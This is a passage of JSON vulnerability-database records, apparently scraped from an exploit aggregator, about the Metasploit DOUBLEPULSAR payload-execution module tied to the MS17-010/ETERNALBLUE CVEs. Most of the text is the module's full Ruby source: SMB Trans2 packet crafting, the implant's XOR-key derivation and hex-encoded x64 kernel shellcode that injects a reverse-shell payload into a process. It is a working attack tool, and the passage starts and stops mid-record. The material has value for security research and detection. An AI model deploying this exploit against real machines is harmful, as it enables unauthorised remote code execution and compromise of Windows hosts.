+\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-21] #"}, "lastseen": "2021-09-21T00:18:31", "differentElements": ["sourceData"], "edition": 21}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "cbac6c153db5910b0687d3a0a89d555b", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-22T06:21:08", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:146236", "PACKETSTORM:142603", "PACKETSTORM:154690"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96705", "SMNTC-96707", "SMNTC-96709", "SMNTC-96703", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-22T06:21:08", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-09-22T06:21:08", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-22] #"}, "lastseen": "2021-09-22T06:21:08", "differentElements": ["sourceData"], "edition": 22}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "1983fef7ddbfa6ccccc661576a2b2284", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": 